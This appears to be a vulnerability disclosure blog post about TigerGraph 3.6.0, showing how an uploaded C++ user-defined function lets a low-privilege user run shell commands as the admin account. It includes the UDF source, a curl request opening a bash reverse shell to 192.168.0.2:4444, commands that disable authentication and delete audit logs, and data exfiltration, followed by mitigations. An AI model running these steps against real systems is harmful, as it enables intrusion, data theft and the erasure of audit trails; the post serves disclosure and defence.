The TigerGraph graph database provides the facility for users to remotely upload arbitrary C++ source code to create user-defined functions. That code is automatically compiled and installed into sensitive system components with little scrutiny. Due to a lack of safeguards this process can be exploited with minimal permissions to give an attacker full control over an entire TigerGraph cluster and underlying servers.

Background

In this post, we detail a critical CVE (Common Vulnerabilities and Exposures) that we discovered in the TigerGraph product. These details have not been publicly disclosed for the last three months to allow sufficient time for TigerGraph to fix the vulnerability and reinforce their security before the details of the CVE became public.

In the next Section, we show how a feature of TigerGraph’s GSQL query language can be used to escalate a user’s privileges to that of the administrative user, disable authentication, exfiltrate sensitive data, and then remove the audit trail.

As of writing, these issues affect the latest version of TigerGraph Server 3.6.0 and any other product that is derived from this code-base. For instance, the Official TigerGraph Docker image. Although unconfirmed, TigerGraph Cloud is also potentially impacted.

The Problem

TigerGraph is a graph database that has a proprietary query language called GSQL. One of the features of GSQL is the ability to create Query User-Defined Functions (abbreviated to UDFs). A UDF is C++ source code that gets compiled and linked into the TigerGraph database to provide extra functionality to GSQL queries.

In TigerGraph, UDFs inherit the features of their implementation language C++ which allows users access to unmanaged memory and unsafe pointers. Since there are no real runtime security protections, pointer and buffer overflow exploits are a real possibility. In fact we found such an exploit – a buffer overflow – a few lines into TigerGraph’s LDBC code (which opened our eyes to this and other similar security shortcomings).

To highlight this critical security vulnerability, we start by demonstrating what users are permitted to do under normal operation of the system and how this undermines some assumptions made about security in TigerGraph. We first show how to obtain a remote shell with administrative privileges on a remote TigerGraph system.

The first step is to bring up a remote TigerGraph system, add some users with different levels of permissions, and create a test database. The instructions for doing this using Docker are provided in Appendix A: Setting Up the TigerGraph Server.

1. Remote Installation of a UDF

Once the system is up and running we will create a new UDF called run_shell_expr from the C++ code below. The UDF will simply take a string evaluate it in a sub-shell and return the output:

cpp
 inline string run_shell_expr (string cmd) {
     char buffer[4096];
     std::string result = "";
     FILE* pipe = popen(cmd.c_str(), "r");
     if (pipe){
         try {
             while (fgets(buffer, sizeof buffer, pipe) != NULL) {
                 result += buffer;
             }
         } catch (...) {
             /*...*/
         }
         pclose(pipe);
     }
     
     return string(result);
  }

Once we have coded up our UDF in a file called udf.hpp on our local machine then we can use the GSQL client to install it on the remote system using the tigergraph user:

bash
$ java -jar gsql_client.jar -ip localhost
Adding gsql-server host localhost
Password for tigergraph : ***
If there is any relative path, it is relative to /dev/gdk/gsql
Welcome to TigerGraph.
GSQL > PUT ExprFunctions FROM "./udf.hpp"
PUT ExprFunctions successfully.

This copies our C++ source file across the network onto the TigerGraph system where it is automatically compiled and installed. At this point our UDF run_shell_expr is available for all users to use in queries despite being uploaded only by the superuser.

Note that for brevity the above code snippet omits some of the boilerplate code required to create a UDF but the full code is available in Appendix A: UDF Code.

2. Remote Installation of a Query

The next step is to create a new query that calls the run_shell_expr UDF. Again this is a remote operation using the GSQL console, but executed by a low-privileged user – bob – who only has local permission to create and run queries on a graph called test (bob has only querywriter permissions). Below we show the GSQL commands to do this:

bash
$ java -jar gsql_client.jar -ip localhost -u bob
Adding gsql-server host localhost
Password for bob : ***
If there is any relative path, it is relative to /dev/gdk/gsql
Welcome to TigerGraph.
GSQL > use graph test
Using graph 'test'
GSQL > begin
GSQL > CREATE QUERY run_cmd(string cmd) FOR GRAPH test {
GSQL >   PRINT run_shell_expr(cmd);
GSQL > }
GSQL > end
Successfully created queries: [run_cmd].
GSQL > install query run_cmd
Start installing queries, about 1 minute ...
run_cmd query: curl -X GET 'https://127.0.0.1:9000/query/test/run_cmd?cmd=VALUE'. Add -H "Authorization: Bearer TOKEN" if authentication is enabled.
Select 'm1' as compile server, now connecting ...
Node 'm1' is prepared as compile server.

[========================================================================================================] 100% (1/1)
Query installation finished.
GSQL >

Once the run_cmd query is installed it will run simple commands on the remote TigerGraph system. In this case we use the id command to see that the UDF is being executed on the remote system by the application-level superuser: tigergraph.

GSQL
GSQL > RUN QUERY run_cmd("id")
{
  "error": false,
  "message": "",
  "version": {
    "schema": 0,
    "edition": "enterprise",
    "api": "v2"
  },
  "results": [{"run_shell_expr(cmd)": "uid=1000(tigergraph) gid=1000(tigergraph) groups=1000(tigergraph)\n"}]
}

3. Remotely Obtaining a Shell

Notice the following message displayed earlier when installing the query:

GSQL
run_cmd query: curl -X GET 'https://127.0.0.1:9000/query/test/run_cmd?cmd=VALUE'. Add -H "Authorization: Bearer TOKEN" if authentication is enabled.

This message lets us know that TigerGraph has automatically created a REST API for the run_cmd query. Therefore, the next step is to obtain a reverse shell running as the tigergraph user but doing so using our user with the least privileges: alice.

For this to work properly, you will need to have a machine that you can route network traffic to on an external address and port. In this example, we use the IP address 192.168.0.2 and port 4444. Once you have your machine set up, open a new console window and in it use the netcat utility to listen to network traffic:

bash
$ nc -l 4444 -v

In another console, we simply generate a HTTP POST request with the alice’s authorization token:

bash
$ curl -X POST \
  -H 'Authorization: Bearer aa4upir75pntu90pckr2ldr395l3hh70' \
  https://localhost:14240/restpp/query/test/run_cmd \
  -d '{"cmd": "bash -c \"bash -i >& /dev/tcp/192.168.0.2/4444 0>&1\""}'
{"error":true,"message":"The query didn't finish because it exceeded the query timeout threshold (16 seconds). Please check GSE log for license expiration and RESTPP/GPE log with request id (65548.RESTPP_1_1.1659629508618.N) for details. Try increase RESTPP.Factory.DefaultQueryTimeoutSec or add header GSQL-TIMEOUT to override default system timeout. ","results":[],"code":"REST-3002"}%

Note the URL needs to be amended slightly because we are forwarding traffic going into a Docker container.

A shell session will open in your first window in which you can freely execute commands as the tigergraph user:

bash
tigergraph@149bd9633fa6:/home/tigergraph/tigergraph/app/3.5.3/bin$ unset LD_PRELOAD
tigergraph@149bd9633fa6:/home/tigergraph/tigergraph/app/3.5.3/bin$ id
id
uid=1000(tigergraph) gid=1000(tigergraph) groups=1000(tigergraph)
tigergraph@149bd9633fa6:/home/tigergraph/tigergraph/app/3.5.3/bin$ pwd
pwd
/home/tigergraph/tigergraph/app/3.5.3/bin

4. Circumventing Security Features and Exfiltrating Data

Now that we have shell access as the administrative user, authentication can now be disabled for the REST API and a selection of the systems audit logs can be deleted to cover the attack:

bash
tigergraph@149bd9633fa6:/home/tigergraph/tigergraph/app/3.5.3/bin$ unset LD_PRELOAD
tigergraph@149bd9633fa6:/home/tigergraph/tigergraph/app/3.5.3/bin$ gadmin config set RESTPP.Factory.EnableAuth false
[   Info] Configuration has been changed. Please use 'gadmin config apply' to persist the changes.
tigergraph@149bd9633fa6:/home/tigergraph/tigergraph/app/3.5.3/bin$ gadmin config apply
[   Note] Changes:
RESTPP.Factory.EnableAuth: true -> false
Proceed to apply? (y/N)y
[   Info] Successfully applied configuration change. Please restart services to make it effective immediately.
tigergraph@149bd9633fa6:/home/tigergraph/tigergraph/app/3.5.3/bin$ gadmin restart restpp nginx gui gsql -y
[   Info] Stopping NGINX RESTPP GSQL GUI
[   Info] Starting ZK ETCD DICT KAFKA ADMIN GSE NGINX GPE RESTPP KAFKASTRM-LL KAFKACONN GSQL GUI
tigergraph@149bd9633fa6:/home/tigergraph/tigergraph/log$ rm gsql/* restpp/* controller/*

To prove that authentication is disabled, some sensitive data can be exfiltrated from a second graph test2 that has zero authorized users:

bash
$ curl -X GET "https://localhost:14240/restpp/graph/test2/vertices/Node"
{"version":{"edition":"enterprise","api":"v2","schema":1},"error":false,"message":"","results":[{"v_id":"1","v_type":"Node","attributes":{"id":1,"value":"hello"}}]}%

Compounding Factors

We have demonstrated that if users so desire they can use the UDF facility in GSQL to circumvent all of TigerGraph’s security safeguards and exfiltrate sensitive data. More importantly, the actual attack can be performed using one of the least privileged roles in the system – queryreader – using TigerGraph’s REST APIs.

The example scenario we used was designed for pedagogical purposes. One of the assumptions that we made is that the attacker would need to install a malicious UDF (something akin to the run_shell_expr UDF) and they would need administrative access to do that. However, it would be naive to dismiss the vulnerability based on the fact that installation privileges are required.

We provide three counter arguments to this line of thinking:

  1. It assumes that the system is free from exploitable bugs;
  2. It implicitly trusts anyone with access to the administrative user not to breach the integrity of the system; and
  3. It means that the administrative user has access to all sensitive data placed in the system.

The CVE demonstrates there are insufficient defenses in TigerGraph to prevent a potential buffer-overflow in a UDF from being exploited by a user with one of the least levels of privilege.

Mitigations

When presented with the exploit, TigerGraph confirmed that this is how they expect UDFs to behave and offered the following mitigations:

  • enable authentication for GSQL and the REST endpoints; and
  • to change the default password of the tigergraph admin user.

TigerGraph’s Docker image has been updated so that remote GSQL clients now prompt the user to enter a password.

However, there remains little protection if the case of a bug being accidentally included in a UDF that is installed into the system (as is the case here) or alternatively, if the attacker has access to the tigergraph user. Permitting unconstrained C++ to be linked to the TigerGraph binary is a risky architectural choice that carries significant downsides.

Recommendations

While the current system architecture and UDF design and protection mechanisms remain, this vulnerability will remain in the TigerGraph product.

Our recommendations for using TigerGraph in the meantime are to:

  • Avoid using UDFs: as even unused ones pose a security risk.
  • If UDFs must be used, sanitize all inputs going between GSQL and a UDF: we acknowledge that this is very difficult as it would either have to be done as a UDF or written using GSQL.
  • Limit TigerGraph’s access to networks that contain sensitive data: as a TigerGraph cluster is able to run arbitrary code then it is wise to ensure that network traffic from and to it is restricted.

Appendix A

Setting Up the TigerGraph Server

Using docker download the latest TigerGraph image and start the server. We follow the instructions provided by TigerGraph here.

1. Download and run the docker image (note: we do not need to attach a volume):

bash
$ docker run -d \
	-p 14022:22 \
	-p 9000:9000 \
	-p 14240:14240 \
	--name tigergraph \
	--ulimit nofile=1000000:1000000 \
	-t docker.tigergraph.com/tigergraph:latest

2. Once the container has started, connect to it via ssh (note: the default password is tigergraph):

bash
$ ssh -p 14022 tigergraph@localhost

3. Start all TigerGraph services:

bash
$ gadmin start all

4. Create an empty graph using GSQL:

bash
$ gsql "create graph test()"

5. Create a user – alice – with minimal privileges using GSQL:

bash
$ gsql "create user"
User Name : alice
New Password : *****
Re-enter Password : *****

6. Grant privileges to alice:

bash
$ gsql -g test "grant role queryreader on graph test to alice"

7. Create secrets for alice:

bash
$ gsql -u alice -p alice -g test "create secret"
The secret: rdua9klbkp88t2jkd8me44nd5638d73t has been created for user "alice".

8. Create a user – bob – with enough privileges to create new queries using GSQL:

bash
$ gsql "create user"
User Name : bob
New Password : *****
Re-enter Password : *****

9. Grant privileges to bob:

bash
$ gsql -g test "grant role querywriter on graph test to bob"

10. Create a second graph called test2 and add a node to it:

bash
$ gsql
GSQL> CREATE VERTEX Node(PRIMARY_ID id UINT, value STRING) WITH primary_id_as_attribute="true"
GSQL> CREATE GRAPH test2(*)
GSQL> begin
GSQL> CREATE QUERY ins(UINT id, STRING value) FOR GRAPH test2 {
GSQL>   INSERT INTO Node VALUES(id, value);
GSQL> }
GSQL> end
GSQL> interpret query ins(1,"hello")

11. Change default password for the tigergraph user:

bash
$ gsql "alter password"

12. Enable RESTPP authentication:

bash
gadmin config set RESTPP.Factory.EnableAuth true
gadmin config apply
gadmin restart restpp nginx gui gsql -y


Setting Up a GSQL Client

1. Once TigerGraph is running we can take a copy of the gsql_client.jar from the running container. Note: that you will need the correct version of the client to connect to the server successfully.

bash
$ docker cp tigergraph:/home/tigergraph/tigergraph/app/3.5.3/dev/gdk/gsql/lib/gsql_client.jar  gsql_client.jar 

2. To open a GSQL console session for a specific user run the client as so:

bash
$ java -jar gsql_client.jar -ip localhost -u 
Adding gsql-server host localhost
Password for  : *****
If there is any relative path, it is relative to /dev/gdk/gsql
Welcome to TigerGraph.
GSQL >


UDF Code


cpp
/******************************************************************************
 * Copyright (c) 2015-2016, TigerGraph Inc.
 * All rights reserved.
 * Project: TigerGraph Query Language
 * udf.hpp: a library of user defined functions used in queries.
 *
 * - This library should only define functions that will be used in
 *   TigerGraph Query scripts. Other logics, such as structs and helper
 *   functions that will not be directly called in the GQuery scripts,
 *   must be put into "ExprUtil.hpp" under the same directory where
 *   this file is located.
 *
 * - Supported type of return value and parameters
 *     - int
 *     - float
 *     - double
 *     - bool
 *     - string (don't use std::string)
 *     - accumulators
 *
 * - Function names are case sensitive, unique, and can't be conflict with
 *   built-in math functions and reserve keywords.
 *
 * - Please don't remove necessary codes in this file
 *
 * - A backup of this file can be retrieved at
 *     /dev_/gdk/gsql/src/QueryUdf/ExprFunctions.hpp
 *   after upgrading the system.
 *
 ******************************************************************************/

#ifndef EXPRFUNCTIONS_HPP_
#define EXPRFUNCTIONS_HPP_

#include 
#include 
#include 
#include 
#include 
#include 

/**     XXX Warning!! Put self-defined struct in ExprUtil.hpp **
 *  No user defined struct, helper functions (that will not be directly called
 *  in the GQuery scripts) etc. are allowed in this file. This file only
 *  contains user-defined expression function's signature and body.
 *  Please put user defined structs, helper functions etc. in ExprUtil.hpp
 */
#include "ExprUtil.hpp"

namespace UDIMPL {
  typedef std::string string; //XXX DON'T REMOVE

  /****** BIULT-IN FUNCTIONS **************/
  /****** XXX DON'T REMOVE ****************/
  inline int64_t str_to_int (string str) {
    return atoll(str.c_str());
  }

  inline int64_t float_to_int (float val) {
    return (int64_t) val;
  }

  inline string to_string (double val) {
    char result[200];
    sprintf(result, "%g", val);
    return string(result);
  }

   inline string run_shell_expr (string cmd) {
     char buffer[4096];
     std::string result = "";
     FILE* pipe = popen(cmd.c_str(), "r");
     if (pipe){
         try {
             while (fgets(buffer, sizeof buffer, pipe) != NULL) {
                 result += buffer;
             }
         } catch (...) {
             /*...*/
         }
         pclose(pipe);
     }
     
     return string(result);
  }

}
/****************************************/

#endif /* EXPRFUNCTIONS_HPP_ */